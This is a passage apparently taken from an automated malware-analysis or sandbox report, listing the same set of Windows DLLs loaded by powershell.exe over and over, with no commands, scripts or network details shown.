                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
